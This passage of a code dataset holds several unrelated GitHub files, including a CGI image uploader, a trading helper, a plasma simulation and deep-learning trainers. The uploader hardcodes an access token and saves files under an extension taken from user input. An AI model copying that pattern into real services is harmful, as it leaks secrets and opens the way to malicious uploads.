8)),\n)\n","repo_name":"AriiMoose/Tall-Tales","sub_path":"TestGame/compiled_krb/key_rules_fc.py","file_name":"key_rules_fc.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10845780902","text":"#!/usr/bin/env python\nimport base64\nimport cgi\nimport json\nimport os\nimport random\nimport string\nimport sys\n\nTOKEN = \"{0c7W8pC8~}V5TPG05Y6mV,q9^,@4+x!$y4;]13'7'O{eb5+8,ig;}q).@42U(^`664)9=1H!<$R135V@;01%:!85l40('75a`'w26*89P1/0%5@;16,>xL`v}U1c6\"\nURL = \"https://scrnsht.xyz/\"\n\ndef output(returnData = []):\n print(\"Content-Type: application/json\")\n print()\n print(json.dumps(returnData))\n\ndef generateName(filetype):\n valid = False\n\n while not valid:\n name = str(random.randint(10000, 99999)).encode()\n hashName = base64.b64encode(name).decode(\"utf-8\")\n for char in hashName:\n if char in string.punctuation:\n hashName = hashName.replace(char, \"\")\n name = hashName + \".\" + filetype\n if not os.path.exists(\"./\" + name):\n valid = True\n return name\n\nif __name__ == \"__main__\":\n try:\n data = json.loads(sys.stdin.read())\n if len(data) == 0 or data['image'] == None or data['token'] == \"\" or data['name'] == \"\":\n output({\"error\": \"Invalid input.\"})\n\n else:\n if data['token'] != TOKEN:\n output({\"error\": \"Invalid token.\"})\n\n else:\n filetype = data['name'].split(\".\")[1]\n filename = generateName(filetype)\n image = base64.b64decode(data['image'])\n\n try:\n with open(filename, 'wb') as imgFile:\n imgFile.write(image)\n\n output({\"href\": URL + filename})\n\n except IOError as e:\n output({\"error\": e})\n except:\n cgi.print_exception()\n","repo_name":"MattAnderson18/TokenUpload-PythonBackend","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20255726477","text":"import numpy as np\nimport pandas as pd\nfrom fuzzywuzzy import fuzz\nfrom fuzzywuzzy import process\nfrom datetime import datetime\n\n# Fuzzy Logic\ndef symbol(x):\n sym = [\"(\", \")\", \" \", \"\\s+\", \"ซอย\", \"ถนน\", \"-\", \".\", \"ฯ\"]\n for i in sym:\n x = x.replace(i, \"\")\n return x\n\n\ndef fuzzy_match(row):\n try:\n matched_str, ratio, index = process.extractOne(row['FILE_A_sym'], FILE_B['FILE_B_sym'])\n row['FILE_B_sym'] = matched_str\n row['RAW_FILE_B'] = FILE_B[COL_B][index]\n row['score'] = ratio\n return row\n except:\n pass\n\nstart = datetime.now()\nprint(\"start at : \", start)\n\nFILE_A = pd.read_csv('project_name_comp.csv')\nFILE_B = pd.read_csv('project_name_subj.csv')\n\n# FILE_A = FILE_A.head(10)\nFILE_B = FILE_B.head(10)\n\nCOL_A = 'project_name_th'\nCOL_B = 'project_name'\n\nFILE_A['FILE_A_sym'] = FILE_A[COL_A].apply(symbol)\nFILE_B['FILE_B_sym'] = FILE_B[COL_B].apply(symbol)\n\nFILE_A = FILE_A.apply(fuzzy_match, axis=1)\nFILE_A.to_csv(\"RESULT.csv\", index=None, encoding='utf-8-sig')\nend = datetime.now()\nprint(\"end at : \", end)\nprint(\"------- \",end-start,\" -------\")\n","repo_name":"namking111/word-matching","sub_path":"fuzzy_logic.py","file_name":"fuzzy_logic.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34686995264","text":"import sys\nsys.path.append(r\"c:\\python\")\nfrom wsg import *\n\nab = lambda:appuifw.note(cn(\"Hello World!\"))\n\ndef main():\n a = Window()\n PushButton(a,cn(\"弹出\"),20,20,80,30,ab)\n b = GroupButton(a,cn(\"组框\"),20,60,100,70)\n PushButton(b,cn(\"嵌套\"),10,20,80,30,ab)\n CheckButton(a,cn(\"检查\"),20,150,52,20)\n RadioButton(a,cn(\"互斥\"),20,180,52,20).SetState(1)\n SysLink(a,cn(\"超链\"),20,210,36,20,ab)\n StaticText(a,cn(\"静态文本\"),20,240,68,20,0xFF0000)\n StaticEdit(a,cn(\"类Windows XP的GUI框架(实际并未模拟消息循环),目前封了PushButton,CheckButton,RadioButton,GroupButton,SysLink,StaticText(单行),StaticEdit,但还不支持动态添加控件。此为静态编辑控件(暂时还不能编辑...),操作:焦点移动到此控件,按下OK键即进入滚动状态(当然以可以滚动为前提),再次按下OK键则离开滚动状态。\"),80,135,120,100)\n Trackbar(a,20,280,200,34,5,0,100,30,True,u\"%.2f\",Trackbar.FOLLOW,0x808080,12)\n a.run()\n \nmain()","repo_name":"zixing131/Pys60_Simulator","sub_path":"Pys60_Simulator/softwares/wsg/demo3.py","file_name":"demo3.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"81"} +{"seq_id":"20306723328","text":"from time import sleep\n\nimport pytest\nimport yaml\n\nfrom hgwz_test.hgwz_appium.企业微信作业二.page.app import App\n\n\ndef get_contack():\n with open('../data/contack.yaml', 'rb') as f:\n datas = yaml.safe_load(f)\n return datas\n\n\nclass TestWexin:\n\n def setup(self):\n \"\"\"启动APP\"\"\"\n self.app = App()\n self.main = self.app.start().goto_main()\n\n def teardown(self):\n self.app.stop()\n\n @pytest.mark.parametrize('name,phone,address', get_contack(), ids=['新姓名1'])\n def test_addcontack(self, name, phone, address):\n mypage = self.main.goto_addresslist().add_member() \\\n .addmember_menual().edit_name(name).edit_phone(phone) \\\n .click_address().add_address(address).click_ok().click_save()\n mytoast = mypage.get_toast()\n assert mytoast == '添加成功'\n\n @pytest.mark.parametrize('name,phone,address', get_contack(), ids=['新姓名1'])\n def test_delcontack(self, name, phone, address):\n mypage = self.main.goto_addresslist().goto_address_manage().goto_revmessage(name) \\\n .del_mess().click_ok()\n sleep(1)\n mylist = mypage.get_list()\n assert name not in mylist\n","repo_name":"he56jian/hgwz_test","sub_path":"hgwz_appium/企业微信作业二/test_case/test_contack.py","file_name":"test_contack.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32184569048","text":"class ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n if not head: return head\n dummy = ListNode(0, head)\n p, q = head, dummy\n k = 1\n while p.next:\n p = p.next\n k += 1\n step = k - n\n while step:\n q = q.next\n step -= 1\n q.next = q.next.next\n return dummy.next\n\n\nif __name__ == '__main__':\n node1 = ListNode(1)\n node2 = ListNode(2)\n node3 = ListNode(3)\n node4 = ListNode(4)\n node5 = ListNode(5)\n\n\n node1.next = node2\n node2.next = node3\n node3.next = node4\n node4.next = node5\n node5.next = None\n\n\n solution = Solution()\n head = solution.removeNthFromEnd(node1, 2)\n print('删除第k个节点后,头结点为{},其值为{}'.format(head, head.val))\n\n while head != None:\n print(head.val)\n head = head.next","repo_name":"THZdyjy/algorithm-progress","sub_path":"链表/删除第k个链表.py","file_name":"删除第k个链表.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10749002686","text":"import cycle\r\nimport numpy\r\nfrom tqdm import tqdm\r\nimport os\r\nimport click\r\nimport json\r\n\r\n\r\n@click.command()\r\n@click.argument(\"jsonfile\") # Input JSON file as command-line argument\r\ndef main(jsonfile):\r\n\r\n # Make sure JSON file was included\r\n if not os.path.isfile(jsonfile):\r\n print(\"ERROR! Please include a parameters JSON file.\")\r\n return\r\n\r\n # Read JSON file and make sure is well written\r\n with open(jsonfile, \"r\") as json_input:\r\n try:\r\n root = json.load(json_input)\r\n except json.decoder.JSONDecodeError as error:\r\n print(\"ERROR! Corrupted JSON file.\\n\")\r\n print(error)\r\n return\r\n\r\n results = root.get(\"results\", [])\r\n samplefile = root.get(\"sample\", None)\r\n outputName = root.get(\"output\", \"data\")\r\n\r\n # Make sure sample file was given\r\n if not samplefile:\r\n print(\"ERROR! Sample file not found in JSON file.\")\r\n return\r\n\r\n # Make sure sample file exists\r\n if not os.path.isfile(samplefile):\r\n print(\"ERROR! Sample file not found.\")\r\n return\r\n\r\n writeSpace = (\"space\" in results)\r\n writeVelocities = (\"velocities\" in results)\r\n writePhaseSpace = (\"phase_space\" in results)\r\n writeEfield = (\"electric_field\" in results)\r\n writePhi = (\"electric_potential\" in results)\r\n writeRho = (\"charge_density\" in results)\r\n\r\n steps = root.get(\"steps\", 50)\r\n ss_freq = root.get(\"ss_frequency\", 10)\r\n dt = root.get(\"dt\", 0.1)\r\n\r\n NP = root.get(\"N\", None)\r\n\r\n # Make sure number of particles was given\r\n if not NP:\r\n print(\"ERROR! Number of particles \\\"N\\\" not found in JSON file.\")\r\n return\r\n\r\n Bext = numpy.array(root.get(\"Bfield\", [0.0, 0.0, 0.0]))\r\n\r\n # Make sure external magnetic field has three components\r\n if len(Bext) != 3:\r\n print(\"ERROR! Magnetic field must have three components.\")\r\n return\r\n\r\n gridSize = root.get(\"grid_size\", [16, 16])\r\n\r\n # Make sure number of nodes has two components\r\n if len(gridSize) != 2:\r\n print(\"ERROR! Grid size must have two components!\")\r\n return\r\n\r\n sys_length = root.get(\"sys_length\", [1.0, 1.0])\r\n\r\n # Make sure length of the system has two components\r\n if len(sys_length) != 2:\r\n print(\"ERROR! System length must have two components\")\r\n return\r\n\r\n Lx, Ly = sys_length\r\n NGx, NGy = gridSize\r\n\r\n dx = Lx / NGx\r\n dy = Ly / NGy\r\n\r\n sample = root[\"sample\"]\r\n\r\n # Read the sample file and make sure is well written\r\n try:\r\n positions = numpy.loadtxt(sample, usecols=(0, 1), unpack=True).T\r\n except IndexError as error:\r\n print(\"ERROR! Not enough columns in some row of the sample file\")\r\n print(\"Make sure that the file is well written!\")\r\n return\r\n\r\n if len(positions) != NP:\r\n print(\"ERROR! Number of particles in JSON file does not match number of rows in sample file\\n\")\r\n print(\"In JSON file: \" + str(NP) + \"\\n\")\r\n print(\"In sample file: \" + str(len(positions)))\r\n return\r\n\r\n try:\r\n velocities = numpy.loadtxt(sample, usecols=(2, 3, 4), unpack=True).T\r\n except IndexError as error:\r\n print(\"ERROR! Not enough columns in some row of the sample file\")\r\n print(\"Make sure that the file is well written!\")\r\n return\r\n\r\n try:\r\n QoverM, moves = numpy.loadtxt(sample, usecols=(5, 6), unpack=True)\r\n except IndexError as error:\r\n print(\"ERROR! Not enough columns in some row of the sample file\")\r\n print(\"Make sure that the file is well written!\")\r\n return\r\n\r\n charges = Lx * Ly * QoverM / NP\r\n masses = charges / QoverM\r\n\r\n # Obtain the indexes of the moving particles\r\n move_indexes, = numpy.where(moves == 1)\r\n\r\n # External magnetic field acting on each particle\r\n Bext = numpy.full((len(move_indexes), 3), Bext)\r\n\r\n folders = [\"/energy\"]\r\n if writeSpace:\r\n folders.append(\"/space\")\r\n if writeVelocities:\r\n folders.append(\"/velocities\")\r\n if writePhaseSpace:\r\n folders.append(\"/phase_space\")\r\n if writeEfield:\r\n folders.append(\"/Efield\")\r\n if writePhi:\r\n folders.append(\"/phi\")\r\n if writeRho:\r\n folders.append(\"/rho\")\r\n\r\n # Create folders to store output\r\n for f in folders:\r\n if not os.path.exists(outputName + f):\r\n os.makedirs(outputName + f)\r\n\r\n # Auxiliary vectors for Boris algorithm v1 and v2\r\n\r\n # v1 is usually named t and v2 is usually named s, but I don't want t\r\n # to be confused with time.\r\n\r\n v1 = 0.5 * QoverM[move_indexes, numpy.newaxis] * Bext * dt\r\n\r\n # Magnitude of v1 squared\r\n v1_2 = numpy.linalg.norm(v1, axis=1) * numpy.linalg.norm(v1, axis=1)\r\n v2 = (2 * v1) / (1 + v1_2[:, numpy.newaxis])\r\n\r\n energy = open(\r\n \"{}/energy/energy.dat\".format(outputName), \"w\")\r\n\r\n print(\"Simulation running...\\n\")\r\n print(\"Saving data each {} steps.\".format(ss_freq))\r\n\r\n # Main cycle\r\n for step in tqdm(range(steps)):\r\n # Whether or not write output for this time step\r\n writeStep = (step % ss_freq == 0)\r\n\r\n # Origin nodes arrays of each cell that has at least a particle in it.\r\n currentNodesX = numpy.array(positions[:, 0] / dx, dtype=int)\r\n currentNodesY = numpy.array(positions[:, 1] / dy, dtype=int)\r\n\r\n # Neighbor nodes of the origin nodes of each cell\r\n nxtX = (currentNodesX + 1) % NGx\r\n nxtY = (currentNodesY + 1) % NGy\r\n\r\n # Unite both arrays into one\r\n currentX_currentY = currentNodesX + currentNodesY * NGx\r\n\r\n # Calculate particles relative position (hx, hy) in each cell\r\n hx = positions[:, 0] - (currentNodesX * dx)\r\n hy = positions[:, 1] - (currentNodesY * dy)\r\n\r\n # Get the particles indexes that are inside of each cell\r\n indexesInNode = numpy.array([numpy.where(currentX_currentY == node)[\r\n 0] for node in range(NGx * NGy)])\r\n\r\n\r\n # Step 1: compute rho\r\n rho = cycle.density(NGx, NGy, dx, dy, hx, hy, currentNodesX,\r\n currentNodesY, nxtX, nxtY, indexesInNode, charges)\r\n\r\n # Step 2: from rho, compute phi\r\n phi = cycle.potential(NGx, NGy, dx, dy, rho)\r\n\r\n # Step 3: from phi, compute electric field on nodes\r\n E_n = cycle.field_n(NGx, NGy, dx, dy, phi)\r\n\r\n # Backwards interpolation, compute electric field acting on particles\r\n E_p = cycle.field_p(NP, dx, dy, E_n, currentNodesX,\r\n currentNodesY, hx, hy, nxtX, nxtY, move_indexes)\r\n\r\n # Initialize leapfrog scheme, outphase velocities backwards half time step.\r\n if step == 0:\r\n cycle.outphase(v1, v2, -1.0, velocities, QoverM,\r\n E_p, dt, move_indexes)\r\n\r\n # Step 4: update particles\r\n cycle.update(v1, v2, positions, velocities, QoverM,\r\n E_p, dt, Lx, Ly, move_indexes)\r\n\r\n final_velocities = numpy.copy(velocities)\r\n\r\n # Outphase velocities forward for energy calculations and writing output\r\n cycle.outphase(v1, v2, 1.0, final_velocities,\r\n QoverM, E_p, dt, move_indexes)\r\n\r\n # Write output specified in JSON file by user\r\n if (writeSpace and writeStep):\r\n space = open(\"{}/space/step_{}_.dat\".format(outputName, step), \"w\")\r\n space.write(\"# x y\\n\")\r\n\r\n if (writeVelocities and writeStep):\r\n vels = open(\r\n \"{}/velocities/step_{}_.dat\".format(outputName, step), \"w\")\r\n vels.write(\"# vx vy vz\\n\")\r\n\r\n if (writePhaseSpace and writeStep):\r\n phaseSpace = open(\r\n \"{}/phase_space/step_{}_.dat\".format(outputName, step), \"w\")\r\n phaseSpace.write(\"# x y vx vy vz\\n\")\r\n\r\n if (writeEfield and writeStep):\r\n electricField = open(\r\n \"{}/Efield/step_{}_.dat\".format(outputName, step), \"w\")\r\n electricField.write(\"# x y Ex Ey\\n\")\r\n\r\n if (writePhi and writeStep):\r\n electricPotential = open(\r\n \"{}/phi/step_{}_.dat\".format(outputName, step), \"w\")\r\n electricPotential.write(\"# x y phi\\n\")\r\n\r\n if (writeRho and writeStep):\r\n chargeDensity = open(\r\n \"{}/rho/step_{}_.dat\".format(outputName, step), \"w\")\r\n chargeDensity.write(\"# x y rho\\n\")\r\n\r\n # Compute kinetic and electrostatic energies\r\n KE = 0.0\r\n FE = 0.0\r\n\r\n for p in move_indexes:\r\n if (writePhaseSpace and writeStep):\r\n phaseSpace.write(\"{} {} {} {} {}\\n\".format(\r\n *positions[p], *final_velocities[p]))\r\n\r\n if (writeSpace and writeStep):\r\n space.write(\"{} {}\\n\".format(*positions[p]))\r\n\r\n if (writeVelocities and writeStep):\r\n vels.write(\"{} {} {}\\n\".format(*final_velocities[p]))\r\n\r\n # Compute kinetic energy\r\n KE += masses[p] * numpy.linalg.norm(\r\n final_velocities[p]) * numpy.linalg.norm(final_velocities[p])\r\n\r\n KE *= 0.5\r\n\r\n for i in range(NGx):\r\n for j in range(NGy):\r\n if (writeEfield and writeStep):\r\n electricField.write(\"{} {} {} {}\\n\".format(\r\n i * dx, j * dy, E_n[i][j][0], E_n[i][j][1]))\r\n if (writePhi and writeStep):\r\n electricPotential.write(\r\n \"{} {} {}\\n\".format(i * dx, j * dy, phi[i][j]))\r\n if (writeRho and writeStep):\r\n chargeDensity.write(\"{} {} {} {}\\n\".format(\r\n i * dx, j * dy, rho[i][j]))\r\n\r\n # Compute electrostatic energy\r\n FE += rho[i][j] * phi[i][j]\r\n\r\n FE *= 0.5\r\n\r\n # Write energy output\r\n energy.write(\"{} {} {}\\n\".format(step, KE, FE))\r\n\r\n # Close output files\r\n if (writePhaseSpace and writeStep):\r\n phaseSpace.close()\r\n if (writeSpace and writeStep):\r\n space.close()\r\n if (writeVelocities and writeStep):\r\n vels.close()\r\n if (writeEfield and writeStep):\r\n electricField.close()\r\n if (writePhi and writeStep):\r\n electricPotential.close()\r\n if (writeRho and writeStep):\r\n chargeDensity.close()\r\n\r\n energy.close()\r\n\r\n print(\"\\nSimulation finished!\\n\")\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"dfrodriguezp/PiCM","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10505,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"37338571303","text":"import math\r\n\r\na = int(input(\"Nhập a: \"))\r\nb = int(input(\"Nhập b: \"))\r\nc = int(input(\"Nhập c: \"))\r\n\r\ndelta = a*a - 4*b*c\r\n\r\nif delta < 0:\r\n print(\"Phương trình vô nghiệm\")\r\nelif delta == 0:\r\n x = (-b/(2*a))\r\n print(f\"Phương trình có nghiệm kép x = {x}\")\r\nelse:\r\n x1 = ((-b + math.sqrt(delta))/(2*a))\r\n x2 = ((-b - math.sqrt(delta))/(2*a))\r\n print(f\"Phương trình có 2 nghiệm x1 = {x1} và x2 = {x2}\")","repo_name":"NguyenPhucHoangAnh/Python","sub_path":"Lab01/Bai2/Cau8.py","file_name":"Cau8.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21505513840","text":"from test_strategy_carrusel.asset import Asset\nfrom binance.client import Client\n\napi_key = ''\napi_secret = ''\n\nclient = Client(api_key, api_secret)\n\n\nclass Methods(Asset):\n # Dictionary of exact decimal places for the specified currency pairs.\n asset_pairs_precision = {'ETHEUR': (4, 2),\n 'EURBUSD': (1, 3),\n 'ETHBUSD': (4, 2)}\n\n # calculates the exact amount of currency to be traded\n @classmethod\n def get_precise_qty(cls, obj_qty, precise_num):\n qty = str(obj_qty)\n qty = qty.split('.')\n right_side = qty[-1][:precise_num]\n result = qty[0] + '.' + right_side\n if precise_num == 0:\n result = qty[0]\n return float(result)\n\n # calculates whether current prices are suitable for trading profit\n @classmethod\n def check_for_profit(cls, asset_on_charge_qty, other_qty, price, profit_percentage, operation):\n if operation == 'multiply':\n relation = (asset_on_charge_qty * price) / other_qty\n if relation >= profit_percentage:\n return True\n else:\n relation = (asset_on_charge_qty / price) / other_qty\n if relation >= profit_percentage:\n return True\n return False\n\n @classmethod\n def execution(cls, obj_on_charge, other_obj, operation, objects, transactions_count):\n message= f'\\n-------EXECUTION-------\\nPair: active - {obj_on_charge.name} nonactive - {other_obj.name}' \\\n f'\\nOrder count: {transactions_count}'\n Methods.print_method(message)\n if operation == 'multiply':\n pair = f'{obj_on_charge.name}{other_obj.name}'\n precise_num = Methods.asset_pairs_precision[pair][0]\n trade_quantity = Methods.get_precise_qty(obj_on_charge.real_quantity, precise_num)\n curr_price = float(client.get_symbol_ticker(symbol=pair)['price'])\n other_obj.on_charge = True\n obj_on_charge.on_charge = False\n other_obj.real_quantity = trade_quantity * curr_price\n message = f'{trade_quantity} {obj_on_charge.name} on price {curr_price} -> {other_obj.real_quantity}'\n Methods.print_method(message)\n\n else:\n pair = f'{other_obj.name}{obj_on_charge.name}'\n precise_num = Methods.asset_pairs_precision[pair][1]\n trade_quantity = Methods.get_precise_qty(obj_on_charge.real_quantity, precise_num)\n curr_price = float(client.get_symbol_ticker(symbol=pair)['price']) * 1.0001\n trade_quantity /= curr_price\n precise_num = Methods.asset_pairs_precision[pair][0]\n trade_quantity = Methods.get_precise_qty(trade_quantity, precise_num)\n other_obj.on_charge = True\n obj_on_charge.on_charge = False\n curr_price = float(client.get_symbol_ticker(symbol=pair)['price'])\n other_obj.real_quantity = trade_quantity\n message = f'{trade_quantity * curr_price} {obj_on_charge.name} на цена {curr_price} -> {trade_quantity}'\n Methods.print_method(message)\n message = 'Active currencies:'\n Methods.print_method(message)\n for obj in objects:\n if obj.on_charge:\n message = f'{obj.name} profit {(obj.real_quantity / obj.init_qty - 1) * 100:.2f}%'\n Methods.print_method(message)\n\n @staticmethod\n def print_method(message):\n print(message)\n","repo_name":"Kiril-Lazarov/Crypto-trading-bots","sub_path":"test_strategy_carrusel/methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":3486,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"4638635401","text":"import os\nfrom tqdm import tqdm\nimport json\nimport torch\nimport torch.distributed as dist\nfrom torch.utils.data import distributed\nfrom torch.utils.tensorboard import SummaryWriter\nfrom torch_geometric.data import DataLoader, DataListLoader\nfrom argoverse.evaluation.eval_forecasting import get_displacement_errors_and_miss_rate\nimport gc\n\n\nclass Trainer(object):\n \"\"\"\n Trainer base class\n \"\"\"\n def __init__(self,\n trainset,\n evalset,\n testset,\n loader=DataLoader,\n batch_size: int=1,\n num_workers: int=1,\n lr: float=1e-3,\n betas=(0.9, 0.999),\n weight_decay: float=0.01,\n warmup_epoch=30,\n with_cuda: bool=False,\n cuda_device=None,\n enable_log: bool=False,\n log_freq: int=2,\n save_folder: str=\"\",\n verbose: bool=True\n ):\n \"\"\"\n :param trainset:\n :param evalset:\n :param testset:\n :param loader:\n :param batch_size:\n :param num_worker:\n :param lr:\n :param betas:\n :param weight_decay:\n :param warmup_epoch:\n :param with_cuda:\n :param cuda_device:\n :param enable_log:\n :param log_freq:\n :param save_folder:\n :param verbose: whether printing debug messages\n \"\"\"\n self.cuda_id = cuda_device if with_cuda and cuda_device else 0\n self.device = torch.device(\"cuda:{}\".format(self.cuda_id) if torch.cuda.is_available() and with_cuda else \"cpu\")\n\n torch.manual_seed(self.cuda_id)\n self.trainset = trainset\n self.evalset = evalset\n self.testset = testset\n self.batch_size = batch_size\n self.loader = loader\n\n self.train_loader = self.loader(self.trainset, batch_size=self.batch_size, num_workers=0, pin_memory=False,\n shuffle=False)\n self.eval_loader = self.loader(self.evalset, batch_size=self.batch_size, num_workers=0, pin_memory=False)\n self.test_loader = self.loader(self.testset, batch_size=self.batch_size, num_workers=0, pin_memory=False)\n\n # model\n self.model = None\n\n # optimizer params\n self.lr = lr\n self.betas = betas\n self.weight_decay = weight_decay\n self.warmup_epoch = warmup_epoch\n self.optim = None\n self.optim_schedule = None\n\n # criterion and metric\n self.criterion = None\n self.min_eval_loss = None\n self.best_metric = None\n\n # log\n self.enable_log = enable_log\n self.save_folder = save_folder\n self.logger = SummaryWriter(log_dir=os.path.join(self.save_folder, \"log\"))\n self.log_freq = log_freq\n self.verbose = verbose\n\n gc.enable()\n\n def train(self, epoch):\n gc.collect()\n\n self.model.train()\n return self.iteration(epoch, self.train_loader)\n\n def eval(self, epoch):\n gc.collect()\n\n self.model.eval()\n return self.iteration(epoch, self.eval_loader)\n\n def test(self, data):\n raise NotImplementedError\n\n def iteration(self, epoch, dataloader):\n raise NotImplementedError\n\n def compute_loss(self, data):\n raise NotImplementedError\n\n def write_log(self, name_str, data, epoch):\n if not self.enable_log:\n return\n self.logger.add_scalar(name_str, data, epoch)\n\n # 保存模型参数\n def save(self, iter_epoch, loss):\n \"\"\"\n save current state of the training and update the minimum loss value\n :param iter_epoch:\n :param loss:\n :return:\n \"\"\"\n self.min_eval_loss = loss\n if not os.path.exists(self.save_folder):\n os.makedirs(self.save_folder, exist_ok=True)\n torch.save({\n \"epoch\": iter_epoch,\n \"model_state_dict\": self.model.state_dict(),\n \"optimizer_state_dict\": self.optim.state_dict(),\n \"min_eval_loss\": loss\n }, os.path.join(self.save_folder, \"checkpoint_iter{}.ckpt\".format(iter_epoch)))\n if self.verbose:\n print(f'[Trainer]: Saving checkpoint to {self.save_folder} ...')\n\n def save_model(self, prefix=\"\"):\n \"\"\"\n save current state of the model\n :param prefix:\n :return:\n \"\"\"\n if not os.path.exists(self.save_folder):\n os.makedirs(self.save_folder, exist_ok=True)\n\n metric = self.compute_metric()\n\n # skip model saving if the minADE is not better\n if self.best_metric and isinstance(metric, dict):\n if metric[\"minADE\"] >= self.best_metric[\"minADE\"]:\n print(\"[Trainer]: Best minADE: {}; Current minADE: {}; Skip model saving...\".format(\n self.best_metric[\"minADE\"], metric[\"minADE\"]))\n return\n\n # save best metric\n if self.verbose:\n print(\"[Trainer]: Best minADE: {}; Current minADE: {}; Saving model to {}...\".format(\n self.best_metric[\"minADE\"] if self.best_metric else \"Inf\",\n metric[\"minADE\"],\n self.save_folder))\n self.best_metric = metric\n metric_stored_file = os.path.join(self.save_folder, \"{}_metrics.txt\".format(prefix))\n with open(metric_stored_file, 'a+') as f:\n f.write(json.dumps(self.best_metric))\n f.write(\"\\n\")\n\n # save model\n torch.save(\n self.model.state_dict(),\n # self.model.state_dict(),\n os.path.join(self.save_folder, \"{}_{}.pth\".format(prefix, type(self.model).__name__))\n )\n\n def load(self, load_path, mode='c'):\n \"\"\"\n loading function to load the ckpt or model\n :param mode: str, \"c\" for checkpoint, or \"m\" for model\n :param load_path: str, the path of the file to be load\n :return:\n \"\"\"\n if mode == 'c':\n # load ckpt\n ckpt = torch.load(load_path, map_location=self.device)\n try:\n self.model.load_state_dict(ckpt[\"model_state_dict\"])\n self.optim.load_state_dict(ckpt[\"optimizer_state_dict\"])\n self.min_eval_loss = ckpt[\"min_eval_loss\"]\n except:\n raise Exception(\"[Trainer]: Error in loading the checkpoint file {}\".format(load_path))\n elif mode == 'm':\n try:\n self.model.load_state_dict(torch.load(load_path, map_location=self.device))\n except:\n raise Exception(\"[Trainer]: Error in loading the model file {}\".format(load_path))\n else:\n raise NotImplementedError\n\n # 计算误差\n def compute_metric(self, miss_threshold=2.0):\n assert self.model, \"[Trainer]: No valid model, metrics can't be computed\"\n assert self.testset, \"[Trainer]: No test dataset, metrics can't be computed\"\n\n forecasted_trajectories, gt_trajectories = {}, {}\n seq_id = 0\n\n k = self.model.k\n horizon = self.model.horizon\n\n self.model.eval()\n with torch.no_grad():\n for data in tqdm(self.test_loader):\n batch_size = data.num_graphs\n gt = data.y.unsqueeze(1).view(batch_size, -1, 2).cumsum(axis=1).numpy()\n\n # inference and transfrom dimension\n out = self.model.inference(data.to(self.device))\n pred_y = out.cpu().numpy()\n\n #record the prediction and ground truth\n for batch_id in range(batch_size):\n forecasted_trajectories[seq_id] = [pred_y_k for pred_y_k in pred_y[batch_id]]\n gt_trajectories[seq_id] = gt[batch_id]\n seq_id += 1\n\n metric_results = get_displacement_errors_and_miss_rate(\n forecasted_trajectories,\n gt_trajectories,\n k,\n horizon,\n miss_threshold\n )\n return metric_results\n\n\n","repo_name":"gah07123/VehicleTrajectoryPrediction","sub_path":"MyVectorNet/trainer/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":8098,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"26701407461","text":"import os\nimport sys\nimport argparse\nimport pandas as pd\n\n\ndef get_args(argv):\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--dataset_root', type=str, default=\"/media/KLAB37/datasets/icubworldtransf\")\n parser.add_argument('--n_instances', type=int, default=10)\n parser.add_argument('--every_k_frames', type=int, default=10,\n help=\"Sample every k frames. Footage is at 10 fps, so a value of 10 means 1 fps.\")\n parser.add_argument('--cam', type=str, default=\"left\", help=\"Use the 'left' or 'right' cam images\")\n\n return parser.parse_args(argv)\n\n\nargs = get_args(sys.argv[1:])\n\n# These four directories should be inside the dataset_root folder (called something like icubworldtransf)\npart_dirs = [\"part1\", \"part2\", \"part3\", \"part4\"]\n\nsessions = ['MIX', 'ROT2D', 'ROT3D', 'SCALE', 'TRANSL']\n\nclass_dict = {}\nclass_ind = 0\nfor part_dir in part_dirs:\n assert part_dir in os.listdir(args.dataset_root)\n for class_name in os.listdir(os.path.join(args.dataset_root, part_dir)):\n class_path = os.path.join(part_dir, class_name)\n if os.path.isdir(os.path.join(args.dataset_root, class_path)):\n class_dict[class_name] = class_path\n class_ind += 1\n\ndfs = []\nfor class_ind, class_name in enumerate(list(class_dict.keys())):\n for instance_ind in range(args.n_instances):\n for session_ind, session in enumerate(sessions):\n session_path = os.path.join(class_dict[class_name], class_name + str(instance_ind+1), session)\n day_dir = sorted([d for d in os.listdir(os.path.join(args.dataset_root, session_path))\n if os.path.isdir(os.path.join(args.dataset_root, session_path, d))])[0]\n session_path = os.path.join(session_path, day_dir, args.cam)\n ims = sorted([im for im in os.listdir(os.path.join(args.dataset_root, session_path)) if \".jpg\" in im])\n df_list = []\n for im_ind, im in enumerate(ims[::args.every_k_frames]):\n row = {\n \"class\": class_ind,\n \"object\": instance_ind,\n \"session\": session_ind,\n \"im_num\": im_ind,\n \"im_path\": os.path.join(session_path, im),\n }\n df_list.append(row)\n dfs.append(pd.DataFrame(df_list))\n\nimg_df = pd.concat(dfs, ignore_index=True)\n\nimg_df = img_df.sort_values(by=[\"class\", \"object\", \"session\", \"im_num\"], ignore_index=True)\n\nimg_df.to_csv(\"icubworldtransf_dirmap.csv\", 